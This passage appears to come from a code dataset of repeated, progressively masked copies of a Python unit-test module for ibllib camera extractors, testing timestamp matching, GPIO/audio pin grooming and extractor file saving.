10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n\n\nclass TestWheelLoaders(unittest.TestCase):\n <function token>\n <function token>\n <function token>\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n <assignment token>\n <assignment token>\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n\n\nclass MockExtracor(BaseExtractor):\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n <function token>\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n <function token>\n <function token>\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = 